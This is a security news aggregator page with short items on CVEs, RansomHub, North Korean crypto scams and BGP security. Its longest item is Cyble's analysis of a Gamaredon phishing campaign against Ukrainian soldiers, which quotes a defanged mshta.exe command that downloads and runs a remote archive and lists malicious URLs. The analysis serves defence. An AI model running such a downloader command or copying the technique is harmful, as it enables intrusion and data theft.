Individuals'' full names, birthdates, phone numbers, ID numbers, email addresses, home addresses, vehicle identification numbers, car brands and models, engine numbers, and vehicle colors were leaked by the unsecured Elasticsearch instance.

by SC Media

Threat actors could leverage CVE-2024-20439 via static credentials to facilitate the compromise of targeted systems with administrative privileges while intrusions involving CVE-2024-20440 could enable the acquisition of log files with credentials and other sensitive details.

by SC Media

SonicWall is warning that a recently fixed access control flaw tracked as CVE-2024-40766 in SonicOS is now ""potentially"" exploited in attacks, urging admins to apply patches as soon as possible. [...]

by BleepingComputer

Immediate withdrawal and deposit takedowns, as well as notifications to the FBI''s Internet Crime Complaint Center and the Singaporean police have been conducted by Penpie following the theft on Tuesday.

by SC Media

We’re focused on… Developments in quantum cryptography. Why? Because a breakthrough by scientists at Oxford University Physics, announced in April 2024, has taken us a step closer to the possibility of individuals and companies leveraging the power of quantum computing – by guaranteeing privacy and security. The breakthrough was laid out in a study, published in the journal Physical Review Letters. One of the lead researchers, Professor David Lucas, said in a statement: “Never in history have the issues surrounding privacy of data and code been more urgently debated than in the present era of cloud computing and artificial intelligence. As quantum computers become more capable, people will seek to use them with complete security and privacy over networks, and our new results mark a step change in capability in this respect.” Where does the urgency behind quantum security come from? When we interviewed cryptography expert Ahmad Almorabea (Senior Penetration Testing Consultant at TCC), we asked if he thinks there’s a risk that industries and governments will be too slow to implement quantum-safe cryptography before quantum computing technology becomes more accessible on open markets. “Yes, there’s a risk,” he said. “Quantum computing’s advancement could potentially break current encryption methods.” “If industries/governments don’t act swiftly to adopt quantum-safe cryptography, sensitive data could be vulnerable in the future. And there are many aspects in cryptography that could be broken, while Quantum computing advances (i.e. key derivation, encryption algorithms, PKI and more).” Speaking on the developments in quantum cryptography that he was particularly optimistic about, Almorabea added: “I believe cryptographic algorithms will be able to search in encrypted texts without the need for understanding the actual texts available. And it’s a big step towards having our privacy back. “I’m excited about the improvement happening in cryptographic algorithms using AI. In scenarios where learning models need to be applied on sensitive data, AI cryptography plays a vital role in preserving privacy. What does the new Oxford University Physics research show? Right now, quantum computing has to operate within highly controlled conditions in order to remain stable – and there are growing concerns about how quickly quantum computing could break existing security and encryption systems. The new study shows that quantum computing in the cloud can be accessed in a way that’s both scalable and practical, and that gives users complete data privacy and security – along with the ability to verify the authenticity of data. They used an approach called ‘blind quantum computing’, which connects two completely separate quantum computing entities (which could, for example, be a person at home accessing a cloud server) in a secure way. Using a combination of quantum memory and photos, researchers developed a system made up of a fibre network link between a server and a device detecting photons, at an independent computer that remotely accesses its cloud services. Study co-lead Dr Peter Drmota said: “Using blind quantum computing, clients can access remote quantum computers to process confidential data with secret algorithms and even verify the results are correct, without revealing any useful information. Realising this concept is a big step forward in both quantum computing and keeping our information safe online.” Ultimately, this could enable commercial development of quantum-enabled devices. Through blind quantum computing, secure devices that safeguard data when users access cloud quantum computing services could be scalable for commercial markets. P.S. - Mark your calendars for the return of Black Hat MEA in November 2024. Want to be a part of the action? Register now!

by HACKLIDO

Cybersecurity teams must beware of RansomHub, a surging RaaS gang. Plus, North Korea has unleashed sophisticated social-engineering schemes against crypto employees. Meanwhile, a new SANS report stresses the importance of protecting ICS and OT systems. And a Tenable poll sheds light on cloud-native VM. And much more!Dive into six things that are top of mind for the week ending September 6.1 - CISA: Keep RansomHub RaaS gang on your radar screenRansomHub, a relatively new ransomware group, has become a serious threat as its successful ransomware-as-a-service (RaaS) model increasingly lures prominent affiliates away from competitors like LockBit.That’s the warning from CISA, which urges cyber teams to protect their organizations by keeping software updated, adopting phishing-resistant multi-factor authentication and training employees to recognize phishing attacks.In an advisory titled “#StopRansomware: RansomHub Ransomware,” CISA details the RaaS gang’s tactics, techniques and procedures, as well as its indicators of compromise, and offers mitigation recommendations.  RansomHub and its affiliates have successfully attacked at least 210 organizations from a wide variety of industries, including from multiple critical infrastructure sectors.Highlights from the advisory include:RansomHub affiliates use double extortion, meaning they encrypt victims’ systems and exfiltrate their data.Preferred initial-access targets include internet-exposed systems and endpoints, while its go-to attack methods are phishing emails, known-vulnerability exploitation and password spraying.These known vulnerabilities have been exploited: CVE-2023-3519, CVE-2023-27997, CVE-2023-46604, CVE-2023-22515, CVE-2023-46747, CVE-2023-48788, CVE-2017-0144, CVE-2020-1472 and CVE-2020-0787.Recommended mitigation measures include:Adopt a recovery plan for storing critical data in locations that are physically separate, segmented and secure. Back up data offline and encrypt it.Enforce strong-password requirements.Maintain all operating systems, software and firmware updated.Protect administrator accounts with phishing-resistant MFA, least-privilege principles and time-based access, like the just-in-time access method.Segment networks and monitor them for unusual and suspicious activity.Check for unrecognized accounts in domain controllers, servers, workstations and directories.Previously known as Cyclops and Knight, RansomHub was launched in February of this year and ranked as the most active ransomware group in July with 11% of all attacks, according to NCC Group.The FBI, the Multi-State Information Sharing and Analysis Center (MS-ISAC) and the Department of Health and Human Services (HHS) partnered with CISA on this advisory.For more information about ransomware trends and security best practices:“Ransomware Is ‘More Brutal’ Than Ever in 2024” (Wired)“How Can I Protect Against Ransomware?” (CISA)“How to prevent ransomware in 6 steps” (TechTarget)“Steps to Help Prevent & Limit the Impact of Ransomware” (Center for Internet Security)“Ransomware: How to prevent and recover” (Canadian Centre for Cyber Security)2 - FBI: North Korean hackers go after crypto playersUsing intricate, persistent and stealthy social-engineering schemes, North Korea’s government is targeting staffers at crypto organizations to steal cryptocurrency by breaching their networks using malware.Specifically, hackers acting on behalf of North Korea’s government have their sights set on organizations that offer cryptocurrency exchange-traded funds (ETFs) and other crypto-based financial products.That’s according to the FBI, which this week issued an alert for companies in the cryptocurrency sector titled “North Korea Aggressively Targeting Crypto Industry with Well-Disguised Social Engineering Attacks.”“North Korea employs sophisticated tactics to steal cryptocurrency funds and is a persistent threat to organizations with access to large quantities of cryptocurrency-related assets or products,” reads the FBI alert.  Tactics employed by these North Korean hackers include:Conducting thorough and detailed research on employees of the crypto organizations they intend to targetCreating elaborate fake offers such as employment and investment opportunities that are tailored for each targeted individualInteracting extensively one-on-one with the victims, often impersonating real people, such as recruitersRequesting to:Execute code or download apps on company-owned devicesConduct “pre-employment” technical tests or exercises involving the execution of packages and scriptsRun a script in order to enable voice calls or video meetings Among the FBI’s recommended mitigations are:Develop methods to verify a contact’s identity.Don’t keep crypto-wallet information, such as logins and passwords, in devices connected to the internet.Decline to take pre-employment tests or to execute code on company-owned devices.Conduct multiple authentication checks and require approvals from unconnected networks before carrying out financial transactions.For more information about crypto hacking trends:“Crypto hacking thefts double to $1.4 bln in first half of 2024” (Reuters)“Can Crypto Be Hacked?” (Investopedia)“2024 Crypto Crime Mid-year Update Part 1 and Part 2” (Chainalysis)“The 6 biggest crypto heists of all time” (Quartz)“Indian crypto platform WazirX confirms $230 million stolen during cyberattack” (The Record)3 - Tenable surveys webinar attendees on cloud-native VMDuring our recent webinar “A Cyber Pro''s Guide to Cloud-Native Vulnerability Management,” we polled attendees about issues related to cloud VM and cloud-native technologies. See what they said about their cloud-native application challenges and cloud VM strategies!(62 webinar attendees polled by Tenable, August 2024)(49 webinar attendees polled by Tenable, August 2024)Want to learn more about the benefits of agentless cloud security and about extending your VM strategy to the cloud? Watch the on-demand webinar “A Cyber Pro''s Guide to Cloud-Native Vulnerability Management” today.4 - SANS: Businesses can’t ignore security of ICS and OTLooking for insights and best practices to boost the cybersecurity of your industrial control systems (ICS) and operational technology systems (OT)? You might want to check out SANS Institute’s new guide ""ICS Is the Business: Why Securing ICS/OT Environments Is Business-Critical in 2024.""The guide stresses that protecting ICS and OT systems is essential for business success and that to secure ICS and OT systems you can’t use the same strategy, processes and tools you employ to protect the IT environment.“The steps outlined here are essential for ensuring that our industrial systems continue to operate safely and reliably,” author Dean Parsons, a SANS Certified Instructor, said in a statement.  Topics covered in the paper include:An overview of the top threats impacting ICS and OT systems, including targeted, tailored strikes against these environments; ransomware attacks; supply chain breaches; and attacks that originate in the IT network.The differences between IT and ICS/OT environments, and why they require a different security approach.Five critical cybersecurity controls for ICS/OT:ICS-specific incident responseNetwork architecture that supports defensible controls, like segmentation and log collectionICS network visibility and monitoringICS secure remote accessRisk-based ICS vulnerability managementHow to use AI to bolster ICS/OT security.The ways in which CISOs can advance their organizations’ ICS/OT security maturity.For more information about OT security, check out these Tenable resources:“Unlock Advanced IoT Visibility in your OT Environment Security” (on-demand webinar)“How To Secure All of Your Assets - IT, OT and IoT - With an Exposure Management Platform” (blog)“Securing The Manufacturing Shop Floor” (white paper)“Fortifying Your OT Environment: Vulnerability and Risk Mitigation Strategies” (on-demand webinar)“CISA Finding: 90% of Initial Access to Critical Infrastructure Is Gained Via Identity Compromise. What Can You Do About It?” (blog)5 - Cybersecurity among top techs getting an AI boostCybersecurity ranks high among the technologies into which organizations are integrating AI in order to beef up their tech stacks’ capabilities and improve IT productivity.That’s according to CompTIA’s “Building AI Strategy” report, based on a survey of 511 tech and business pros in North America.When respondents were asked which of their tech initiatives are incorporating AI, cybersecurity came in third, mentioned by 61%, behind automation (67%) and data analysis (63%). “In these (three) cases, AI can understand a wide variety of inputs related to the problem at hand, then provide various forms of assistance, such as direct automation of certain tasks, suggestions of patterns found in data, or predictions of cyber attacks,” the report reads.  Cybersecurity also made the list of respondents’ main concerns related to their use of AI in technology, ranking third. The top concern was finding the right interaction balance between AI tools and employees, followed by infrastructure costs for AI.For more information about the intersection of AI and cybersecurity, check out these Tenable blogs:“How to Discover, Analyze and Respond to Threats Faster with Generative AI”“Securing the AI Attack Surface: Separating the Unknown from the Well Understood”“Never Trust User Inputs -- And AI Isn''t an Exception: A Security-First Approach”“Do You Think You Have No AI Exposures? Think Again”“AI Is About To Take Cybersecurity By Storm: Here''s What You Can Expect”6 - U.S. government wants to boost security of internet routingThe technology that underpins the internet’s traffic routing is insecure – a dangerous weak link that cyberattackers are increasingly targeting and that represents a global cyber risk.So said the White House, which is urging a variety of players, including government agencies, internet service providers, academia, mobile operators and cloud providers, to help address the problem.The report “Roadmap To Enhancing Internet Routing Security” by the Office of the National Cyber Director was released this week and aims to foster the adoption of technologies that can make the ubiquitous Border Gateway Protocol (BGP) more secure.“As initially designed and commonly operating today, BGP does not provide adequate security and resilience features for the risks we currently face,” the report reads. For example, BGP is unable to determine if messages exchanged between neighboring networks are authentic, nor can it verify that information from remote networks is legit. Over the past two decades, BGP’s design vulnerabilities have led to serious misconfiguration accidents, and opened the door for a variety of cyberattacks.The good news is that initial techniques to boost BGP’s security and resilience have been introduced and standardized, and are being deployed, specifically security mechanisms based on Resource Public Key Infrastructure (RPKI), according to the document.“This roadmap provides recommendations and guidance necessary to increase the adoption of these initial BGP security technologies across all network operators in the Internet ecosystem,” the report reads.

by Tenable

Key Takeaways Cyble Research and Intelligence Labs (CRIL) identified an active Gamaredon campaign targeting Ukrainian military personnel through spear-phishing emails. The emails include malicious XHTML attachments, which, when opened, execute obfuscated JavaScript code that downloads a malicious archive to the victim’s system. This archive contains a Windows shortcut (LNK) file that, when triggered, initiates the execution of a remote .tar archive hosted on TryCloudflare[.]com via mshta.exe. The Threat Actors (TAs) leverage TryCloudflare’s one-time tunnel feature to anonymously host malicious files and access resources remotely without detection. The campaign appears to be large-scale and coordinated, as indicated by the widespread distribution of similar files, and it remains ongoing based on the volume and timing of discovered samples. The inclusion of a 1-pixel remote image suggests the TAs are tracking victim interactions with the malicious files, likely to monitor the campaign''s effectiveness. Executive Summary As the Russia-Ukraine conflict continues to evolve, we remain vigilant in monitoring emerging threats. Previously, we tracked the activities of UNC1151, which targeted Ukraine’s Ministry of Defence with a malicious Excel document designed to compromise sensitive systems. Additionally, we observed UAC-0184’s malware campaign, which deployed the XWORM RAT against Ukrainian targets, utilizing Python to facilitate DLL sideloading techniques for further infiltration. During our investigation, we came across an ongoing campaign of Gamaredon targeting Ukraine. Gamaredon, also known as Primitive Bear or Armageddon, is a Russian-linked Advanced Persistent Threat (APT) group that has been active since at least 2013. It is known for its cyber-espionage activities, primarily targeting Ukrainian government institutions, military, and other critical infrastructure sectors. Gamaredon has been involved in numerous high-profile campaigns, particularly during periods of heightened tension between Russia and Ukraine. Although its operations have been characterized by the use of relatively low-sophistication tools, its success is attributed to its persistence and focus on specific geopolitical targets. In recent months, Gamaredon has intensified its efforts with a large-scale phishing campaign aimed at Ukrainian entities. This campaign involves sophisticated tactics and widespread phishing attempts, reflecting the ongoing and escalating nature of cyber threats amidst the conflict. The figure below shows the Gamaredon sample observed since the start of August 2024. Figure 1 - Gamaredon Sample Observed in the Wild Amid the ongoing Russia-Ukraine conflict, Cyble Research and Intelligence Labs (CRIL) encountered a spear-phishing campaign targeting Ukrainian military personnel. The malicious email contains an XHTML attachment that, upon opening, executes several malicious activities on the infected system. After thorough analysis, our research points to the Gamaredon APT group as the orchestrator of this attack.  Technical Details The campaign begins with a spear-phishing email bearing the subject ""ПОВІСТКА,"" which translates to ""summons."" The email is themed around a military summons directed at the recipient and includes a malicious XHTML attachment, as shown in the figure below. Figure 1 - Gamaredon Sample Observed in the Wild Upon opening the XHTML file, the user is presented with a message in Ukrainian stating, ""File uploaded to the ''DOWNLOADS'' folder."" Simultaneously, a RAR compressed folder is silently dropped into the system''s Downloads directory. This action is designed to mislead the victim, making it appear as though a legitimate file has been downloaded. The figure below shows the XHTML message. Figure 3 - XHTML file The XHTML file contains obfuscated JavaScript code that executes upon the user opening the file. In the XHTML, the JavaScript is embedded within a `div` element, with the `div id` set to “jwu.” This obfuscated script consists of a Base64-encoded string mixed with a “*” character at random places to evade detection. The JavaScript execution is triggered via the ""onerror"" event. In some variants, it is activated through the ""onmousemove"" event, ensuring the malicious code runs as soon as the user interacts with the file. The figure below shows the obfuscated XHTML code. Figure 4 - XHTML Code The de-obfuscated string within the “jwu” `div` reveals JavaScript code that contains a Base64-encoded 7zip compressed archive disguised with a .rar file extension. This script decodes the Base64 data and saves the 7zip archive to the Downloads folder as “5-2839-2024_29.08.2024.rar.” Additionally, the script retrieves a 1-pixel remote image, likely serving as a tracking mechanism to monitor the execution and interaction with the malicious file. The figure below shows the de-obfuscated JavaScript. Figure 5 - Deobfuscated JavaScript The RAR file contains a Windows shortcut (LNK) file. Upon execution, the malicious LNK file triggers the execution of the remote .tar file via mshta.exe. In this campaign, the TAs leveraged the domain trycloudflare[.]com to host the malicious tar archives. By exploiting the TryCloudflare service, TAs can establish a one-time tunnel without the need for an account with Cloudflare. This tunnel enables remote access to resources and data outside the local network, functioning similarly to a VPN or secure shell (SSH) protocol, allowing the attackers to evade traditional detection mechanisms. The Target command of the LNK file is mentioned below. “C:\Windows\System32\mshta.exe hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare.com/tcg/instruct/instructor.tar /f”  The figure below shows the property of the LNK file. Figure 6 - Property of LNK File We were unable to obtain the .tar files in our research. However, according to an analysis by Cisco Talos, Gamaredon is known for downloading additional malicious files designed to steal sensitive information from the victim''s system. Conclusion The ongoing Gamaredon APT campaign demonstrates the group''s persistence and evolving tactics in targeting Ukrainian military personnel. By leveraging spear-phishing emails, malicious XHTML attachments, and obfuscated JavaScript, the attackers deliver harmful payloads while exploiting TryCloudflare’s one-time tunnel feature to host malicious archives. The campaign’s scale and frequency indicate a coordinated, mass phishing effort aimed at sensitive Ukrainian entities. Recommendations The following are the recommendations to Mitigate the Gamaredon APT Campaign. Train users to recognize spear-phishing attempts, especially those with suspicious attachments or unexpected military-themed content. Implement email security solutions with advanced threat protection, filtering phishing emails and malicious attachments. Deploy anti-malware solutions capable of detecting and blocking obfuscated JavaScript and malicious LNK files.  Monitor for unusual network activity, including connections to TryCloudflare tunnels and other unknown external resources. Use application whitelisting to allow only trusted applications and scripts to run. Leverage threat intelligence platforms to block known malicious domains, including those abusing TryCloudflare. MITRE ATT&CK® Techniques Tactic  Technique Procedure Initial Access (TA0001) Phishing: Spearphishing Attachment (T1566.001 ) Gamaredon sends spear-phishing emails with malicious XHTML attachments targeting Ukrainian military personnel. Execution (TA0002) User Execution: Malicious File (T1204.002) The campaign relies on users opening the XHTML attachment, which then triggers JavaScript code execution. Execution (TA0002) Signed Binary Proxy Execution: Mshta (T1053.005) mshta.exe is used to execute a remote .tar archive file hosted on a compromised cloud service. Defence Evasion (TA0005) Obfuscated Files or Information (T1027) The campaign uses obfuscated JavaScript hidden in the XHTML file, including random “*” characters in Base64 encoded strings to avoid detection. Indicators Of Compromise Indicator Indicator Type Description 0c823adb18cf2583222e6fbe73c08cac8147d20b02fbe88d51cac2a1c628a30b SHA256 XHTML 12bac5853724722330ce7f6b782db13844f8343ccc851fa2db1e93b980a6cf49 SHA256 XHTML a4806713db9cf41ab503e046981b8c5e1a9928314bb32545bd104fab2c36b332 SHA256 XHTML 0fd6e081172d8576ad2f16ab6360a0086442560aa24ab1f4636a592f279c19ef SHA256 XHTML 66de05ae4f4f185a514ad11daac0b7f944748ffa6885a7d7a826def45d305cfe SHA256 XHTML 1a6ce74fc1487537936d769243f39b265fd3911e72e7caacaa793f1fffe52296 SHA256 XHTML e6d342fde640e5d5d9ef2f470d0f23ed660d7f19cc33470ec40a9f8e9b9c1561 SHA256 XHTML 17f66f2b3e2f9ba8c8f739876f99e2d7abc81b264f3015d3de86267f007cc49b SHA256 XHTML 10cecb7a032325024b9ba7a0ea5f1a910268078317ca4ca7dae9e06779837631 SHA256 XHTML 83d4b0aea975acb7f80417748f179d8ef9ecbba9150b24e3354ef92e17ccf242 SHA256 XHTML 201ad0967246bb0a5b3f7aa85f31395e750c0237959d86b9c2d9dbf5fbb951c4 SHA256 XHTML d4df2899a4569f7cb9ac5edce6b4eef8eba3031b7f96f74552734362afea18b7 SHA256 XHTML 95beb4bd1a94c8db58dddeb926f656003e1dca2c66d04870380445b23840b536 SHA256 XHTML 13f065a592246074d7d929dd4f977d247a69efa9e1dbbe3613f81d3d8f39d6f4 SHA256 XHTML a1d689a0839a143e371242fb217db82e0cbdfeff4daa49e6ffe5c5b3375fae3d SHA256 XHTML 4b1d8e58c866a8b12e8987559287592ee54a482328e8c03d5666a761bcf10f92 SHA256 XHTML db63ca233296a239e4b8d7f28b2db776596bcb645d3958bc4b3447074d7635b9 SHA256 XHTML 2da9941aae860aaa2d3bb7208c900549464955733457f529014d945a24737e79 SHA256 XHTML 2636907826c9bc27ee4c7519979c0add5ad981e71edf7eb53002b8ab89fc8142 SHA256 XHTML e18955f5a9fb6abb30fd5dcbc840d34cce9bb1c70552cc36941139fc6e7304b5 SHA256 XHTML 0ae813d5ea1c0114795174a48b57a90c0f719485e3c733bbd5403c77dab29298 SHA256 XHTML 71e02cfc2c871768b8ae5ad9af9e9cb664e0a66be3f3c8d050b6d58f3cd4c07a SHA256 XHTML ad2c0c8d14d782610ed7173a5d0b4bd13524ceb1027d070a1cda312cfd60983a SHA256 XHTML 1cbd7696840ec6a3442a8bf4f7deb545bbeeee68fb27e4352197953af976cf2a SHA256 XHTML 0a4bcecdee823cc3c2d4ae2d5569edca7bc8372f5d37f62083782e92732a63c8 SHA256 XHTML afa7a8bb0cb0508f579b936488bbfff0142d458c26ef98904cb06e98f6b50f81 SHA256 XHTML 265042be55ec0082a500a24cdb5da8b289c42116e23eddcfc80dfd24019f6412 SHA256 XHTML 1b3db58482ad147faeda64eced7648bee08bfc78194e3f7bcb52cf1860d07a04 SHA256 XHTML 821ee2a91cca1e17f890e099ee41a47cc5943149a10e81467e57803d6d5b02de SHA256 XHTML 0e1eb8a5f850bc7712f78adcfe6c7c29215ea620ad2c36a0795016f0299d6ea4 SHA256 XHTML f9662c14db97db311d71b00ce33a41bbc4bc4ab6f05d8ccd99562e773d8948b1 SHA256 XHTML c7802521935c6dc3dc81e15ac952b9782ca1743dcd9e4e11030f0957d8f2a156 SHA256 XHTML 56188e68f6f6bba34f6771056859f1a7232edef264fbe67e0c8b30c1ca569259 SHA256 XHTML a620f9af481001e2d96a2d210f086fa144731a1b95db32addcd148e09a627374 SHA256 XHTML df124b73f309e634ca7c226c5e1ae2545f45907a88a40249c8ac1d5e40eca43f SHA256 XHTML f94817a02884f73f9ed462c67581cda4fc169568f7636f01237a25da3df93d7c SHA256 XHTML 5f7173cd548b227206e70419739a2f6ca4087ef693297b9b67a29fbcb4d1e928 SHA256 XHTML f59715593679ff13e92e14f8f98c6ead1cbe678f3a5ac28de8085c1a7132b02c SHA256 XHTML 58d6c125ccab32414f63ba62cc7ba4a2500a0d2890506069ba7e0ac166799491 SHA256 XHTML 51427e20fc02cb04948c2ab53378beb52727a6a84570f880aeaebd6be27f1dad SHA256 XHTML bbc97c086436385c32b0ac5f6cf35e7446f0e12e0412ed090e7099b873837795 SHA256 XHTML a7d060ea2dfd98f723aff909e5c88c3d8d3d54d96e5f6e7a09aad1de8d8ef10b SHA256 XHTML cba52f16695dc3d80a98c560a7614a3f91aaea242344b423b260d06362a2c9e0 SHA256 XHTML ab333d21c0fa8fe5b6cd620736fb04d7af53a6a0be604066617a1374fa7baa78 SHA256 XHTML a4b912413e39b4307613c8941af258750782e77d820c172155dfaaee6b32d2db SHA256 XHTML c863155cf6a39a376eef232737ba2922e324d8b05de36ddebe4068060b09a498 SHA256 XHTML bee43c5f1a714fdef911e5dc99fe27854f5db00de859dddc09e720eb56e1c53e SHA256 XHTML ca7a5daf2528233dae5c38d929a07ef30d5ca7d349df2ce842d795311f22fa2f SHA256 XHTML 770223d8c0c7d5abd4d6c0215cf9479f7a0e32a1dfaaa3b42c71dfe26ccb986f SHA256 XHTML dacb0c04579116f6245ca0ee69a5d328c3f23e5d0c5f579133070fe0f06659d1 SHA256 XHTML 0a06f536d08150ce6ea521a563fd321229b9e044ce993f9a667336a34d838b3f SHA256 XHTML 57dd02447cf705fe570ed6b3051f3bff06e8506360ba667e02731332d04eb37c SHA256 XHTML 0e0ce820f8b5deae3755ed372a0b898861a4cc7cb70cfd90197452773b078452 SHA256 XHTML dbdff73a7a6e6eae23c8cd5093b3df11f39cddf86e48b651e68c329df59ee0e8 SHA256 XHTML c32f28fc87f8efcd3f9c044f1898f3e712d4b4802c99df1525644ebfb3df2f2d SHA256 XHTML e867ce12e119eebe53de1acccd99fca09a9802d1432d31dafaf5d76b8a87f099 SHA256 XHTML 92ee588be70e23ca459627ae22f05fba11589eeaeed0f8dd153416d952bb57e0 SHA256 XHTML 1ab3b99af98b7d9fb13d5b6acfc1bf3f4aa2a751bea58ba060f386509ccc73d3 SHA256 XHTML b8f91aae00889eda914ef72b99688e920e113fb3723607250d2a1c949effaac3 SHA256 XHTML b95eea2bee2113b7b5c7af2acf6c6cbde05829fab79ba86694603d4c1f33fdda SHA256 XHTML 7525cd06447204ce72e5d24eb1e96c142d72f9f8f5339d61b6151f430bda2dae SHA256 XHTML be801d78c112fae7a1cec1d20e1f2a85f28987d15c825c1773860bc7e99c5e87 SHA256 XHTML de2f0a2aafacfee9d7989cdafd0617211a44d320b0fba6c488f480d92dab0891 SHA256 XHTML 66d30cc00a2445c5527049875e43c2c85a8995a0983502cd5e0276235bab8040 SHA256 XHTML 450badddfae09a3eedb613e59f9a18d69632ee28d5e59e52c6d4bae151225f87 SHA256 XHTML d55a4a4596908abc5742f43e9b44b23951935feead10de52f3916ac5fd811a80 SHA256 XHTML 7cdf0df1284b75a7d4e945d1d6a707c65e3527ae38aea7c9d82163c019c8203c SHA256 XHTML 37c7adb7a719ec99c54b86faad0a2e5164599f0b85ecbc07683b89da0355c655 SHA256 XHTML efceb2cb0d0a332a630c04a8bce6f0e5dedd297ce7c0943f3783ee0749342ef3 SHA256 XHTML ce040948011f0ccc9309ab2cb08c7a80bf0337415818cf916e6e2e7ed70ed49e SHA256 XHTML 5938c03b725f37f68ebf950edf4fd5688900e273ee0a55c305ff4fd9995d03b1 SHA256 XHTML 112bd0f71522e05c21ad249a20534fb8d3306a73f5c39dd44bfb9e198a96e9f8 SHA256 XHTML cbfe9331e8a1b36f8e5be68f6588a6a116dfd63b474fcac618bc75854535e699 SHA256 XHTML c449c4be65021a4563da97ae4f150bed4f388236031d33e17953b7d6666381e1 SHA256 XHTML 6c1e4a444e40b27db722be2321eb1c69455251940b30f0e2232103015b7af3cc SHA256 XHTML 11b0f2bbb811f42dd463c247401fddd9c2efb2708b9be142573597ee869da29a SHA256 XHTML 7c2bbaaa90b7f66b9ccfb3136905e8d07d8c8f1542aa605844319992a39133c9 SHA256 XHTML 982dac7a43329d6e204e74d87d60c08e94ba3a46ccf36445b218b86f05e44a90 SHA256 XHTML 5a70f39a3d87469146b0a8a92086675dc15e483aa412a0a9aa5dc9809bf8f22f SHA256 XHTML 663c6f08b3aedb4323e0f73cab526ddcc1f6de53ea7084712940c1cb54d75ab0 SHA256 XHTML hxxps://newbie-housewives-poxxer-trailers[.]trycloudflare[.]com/zgur/preservation/selected[.]rar URL Malicious URL hxxps://newbie-housewives-poxxer-trailers[.]trycloudflare[.]com/zgur/seeing/prayers[.]rar URL Malicious URL hxxps://amsterdam-sheet-veteran-aka[.]trycloudflare[.]com/regular/presence[.]tar URL Malicious URL hxxps://amsterdam-sheet-veteran-aka[.]trycloudflare[.]com/preceding/baron[.]tar URL Malicious URL hxxps://tracked--radar-ni[.]trycloudflare[.]com/zgur/sensation/headstone[.]rar URL Malicious URL hxxps://cod-identification-imported-carl[.]trycloudflare[.]com/f/precaution[.]rtf URL Malicious URL hxxps://strange-hunger-appeared-res[.]trycloudflare[.]com/uss/senior/refuge[.]tar URL Malicious URL hxxps://strange-hunger-appeared-res[.]trycloudflare[.]com/gss/quest/presents[.]tar URL Malicious URL hxxps://nobody-principal-long-un[.]trycloudflare[.]com/pov/decide/barn[.]tar URL Malicious URL hxxps://molecular-throw-process-dealtime[.]trycloudflare[.]com/gss/quietly/seller[.]tar URL Malicious URL hxxps://tracked--radar-ni[.]trycloudflare[.]com/zgur/questions/preponderant[.]rar URL Malicious URL hxxps://tracked--radar-ni[.]trycloudflare[.]com/psvr/decay/barefooted[.]rar URL Malicious URL hxxps://newbie-housewives-poxxer-trailers[.]trycloudflare[.]com/psvr/rejoined/net[.]rar URL Malicious URL hxxps://sunrise-massive-joseph-commodities[.]trycloudflare[.]com/zsvr/sentiment/banisters[.]rar URL Malicious URL hxxps://wp-acm-configuration-fm[.]trycloudflare[.]com/uss/growth/days[.]tar URL Malicious URL hxxps://nobody-principal-long-un[.]trycloudflare[.]com/pov/intake/bargain[.]tar URL Malicious URL hxxps://strange-hunger-appeared-res[.]trycloudflare[.]com/uss/bargain/barton[.]tar URL Malicious URL hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare[.]com/tcul/based/guarded[.]tar URL Malicious URL hxxps://tracked--radar-ni[.]trycloudflare[.]com/sudu/insufficient/neutral[.]rar URL Malicious URL hxxps://tracked--radar-ni[.]trycloudflare[.]com/sudu/decide/quest[.]rar URL Malicious URL hxxps://australian-prepared-derek-hands[.]trycloudflare[.]com/vo/nervous/bar[.]tar URL Malicious URL hxxps://bush-worcester-houses-statements[.]trycloudflare[.]com/sudu/headlong/headache[.]rar URL Malicious URL hxxps://expertise-sir-designs-columbus[.]trycloudflare[.]com/tu/lost/net[.]tar URL Malicious URL hxxps://australian-prepared-derek-hands[.]trycloudflare[.]com/vomr/regards/bananas[.]tar URL Malicious URL hxxps://australian-prepared-derek-hands[.]trycloudflare[.]com/vg/relax/quickly[.]tar URL Malicious URL hxxps://nobody-principal-long-un[.]trycloudflare[.]com/pov/preparations/sequel[.]tar URL Malicious URL hxxps://charter-blond-desired-promptly[.]trycloudflare[.]com/gmm/base/guarantee[.]tar URL Malicious URL hxxps://wp-acm-configuration-fm[.]trycloudflare[.]com/uss/heap/September[.]tar URL Malicious URL hxxps://expertise-sir-designs-columbus[.]trycloudflare[.]com/tu/grow/precaution[.]tar URL Malicious URL hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare[.]com/tcg/instruct/instructor[.]tar URL Malicious URL hxxps://axxribute-homework-generator-lovers[.]trycloudflare[.]com/onp/decent2/decent[.]tar URL Malicious URL hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare[.]com/tcu/headphones/bananas[.]tar URL Malicious URL hxxps://infected-gc-rhythm-yu[.]trycloudflare[.]com/ug/insurance/predicate[.]tar URL Malicious URL hxxps://mind-apple-slightly-twiki[.]trycloudflare[.]com/ug/daytime2/daytime[.]tar URL Malicious URL hxxps://infected-gc-rhythm-yu[.]trycloudflare[.]com/ug/quick/prediction[.]tar URL Malicious URL hxxps://amsterdam-sheet-veteran-aka[.]trycloudflare[.]com/seeming/quay[.]tar URL Malicious URL hxxps://longitude-powerpoint-geek-upgrade[.]trycloudflare[.]com/sg/precision2/precision[.]tar URL Malicious URL hxxps://amsterdam-sheet-veteran-aka[.]trycloudflare[.]com/regions/headmaster[.]tar URL Malicious URL The post Spear-Phishing in the Battlefield: Gamaredon’s Ongoing Assault on Ukraine’s Military appeared first on Cyble.

by CYBLE

Cequence Security announced a new partnership with Netskope. Through the partnership, Netskope customers can now leverage unique API threat intelligence from the Cequence Unified API Protection (UAP) platform to unlock insights into real-world threats and ultimately strengthen organizational security posture. Cybercriminals increasingly target APIs and deploy automated attacks such as bots, exposing organizations to data breaches, compliance violations, and financial loss. The explosive growth of APIs has created a complex threat landscape, requiring comprehensive solutions … More → The post Cequence Security partners with Netskope to provide protection for business-critical APIs appeared first on Help Net Security.

by Help Net Security

Welcome to Picus Security''s monthly cyber threat intelligence roundup! 

by Picus Security

